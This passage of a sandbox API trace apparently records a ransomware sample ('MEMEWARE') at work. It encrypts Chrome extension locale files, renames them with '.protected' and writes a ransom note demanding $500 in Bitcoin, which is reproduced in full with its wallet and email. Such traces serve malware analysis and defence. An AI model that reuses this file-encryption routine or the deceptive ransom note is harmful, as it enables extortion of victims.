(in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 138 [0078.899] lstrcmpW (lpString1="_locales", lpString2=".") returned 1 [0078.899] lstrcmpW (lpString1="_locales", lpString2="..") returned 1 [0078.899] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\*") returned 140 [0078.899] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0078.901] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.901] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.901] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.901] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.901] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.901] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\.") returned 140 [0078.901] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.901] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.901] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.901] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.901] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.901] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.901] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.901] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\..") returned 141 [0078.901] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.901] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.901] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.901] lstrcmpiW (lpString1="ar", lpString2="Windows") returned -1 [0078.901] lstrcmpiW (lpString1="ar", lpString2="Program Files") returned -1 [0078.901] lstrcmpiW (lpString1="ar", lpString2="Program Files (x86)") returned -1 [0078.901] lstrcmpiW (lpString1="ar", lpString2="$Recycle.bin") returned 1 [0078.901] lstrcmpiW (lpString1="ar", lpString2="System Volume Information") returned -1 [0078.901] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar") returned 141 [0078.901] lstrcmpW (lpString1="ar", lpString2=".") returned 1 [0078.901] lstrcmpW (lpString1="ar", lpString2="..") returned 1 [0078.902] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\*") returned 143 [0078.902] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.902] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.902] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.902] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.902] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.902] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.902] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\.") returned 143 [0078.902] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.902] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.905] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.905] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.905] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.905] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.905] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.905] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\..") returned 144 [0078.905] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.905] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.905] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.905] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.905] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.905] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.905] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.905] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.905] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json") returned 155 [0078.905] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.905] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.905] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.905] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.905] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.906] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json") returned 155 [0078.906] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.906] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json") returned 155 [0078.906] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.906] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json") returned 155 [0078.906] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.906] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xf6, lpOverlapped=0x0) returned 1 [0078.907] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff0a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.907] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xf6, lpOverlapped=0x0) returned 1 [0078.907] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.907] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.907] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.907] CloseHandle (hObject=0x168) returned 1 [0078.908] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json.protected") returned 165 [0078.908] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json.protected")) returned 1 [0078.908] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.908] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.908] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\RESTORE_FILES.txt") returned 159 [0078.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.909] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.909] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.909] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.909] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.910] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.910] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.910] CloseHandle (hObject=0x164) returned 1 [0078.910] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.910] lstrcmpiW (lpString1="bg", lpString2="Windows") returned -1 [0078.910] lstrcmpiW (lpString1="bg", lpString2="Program Files") returned -1 [0078.910] lstrcmpiW (lpString1="bg", lpString2="Program Files (x86)") returned -1 [0078.910] lstrcmpiW (lpString1="bg", lpString2="$Recycle.bin") returned 1 [0078.910] lstrcmpiW (lpString1="bg", lpString2="System Volume Information") returned -1 [0078.910] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg") returned 141 [0078.910] lstrcmpW (lpString1="bg", lpString2=".") returned 1 [0078.910] lstrcmpW (lpString1="bg", lpString2="..") returned 1 [0078.910] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\*") returned 143 [0078.910] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.910] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.910] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.910] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.910] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.910] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.910] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\.") returned 143 [0078.910] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.911] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.911] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.911] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.911] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.911] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.911] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.911] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\..") returned 144 [0078.911] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.911] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.911] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.911] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.911] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.911] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.911] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.911] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.911] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json") returned 155 [0078.911] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.911] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.911] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.911] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.912] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json") returned 155 [0078.912] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.912] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json") returned 155 [0078.912] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.912] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json") returned 155 [0078.912] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.912] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x108, lpOverlapped=0x0) returned 1 [0078.913] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.913] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x108, lpOverlapped=0x0) returned 1 [0078.913] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.913] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.913] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.913] CloseHandle (hObject=0x168) returned 1 [0078.914] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json.protected") returned 165 [0078.914] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json.protected")) returned 1 [0078.914] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.914] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.914] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\RESTORE_FILES.txt") returned 159 [0078.914] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.915] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.915] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.915] lstrlenA 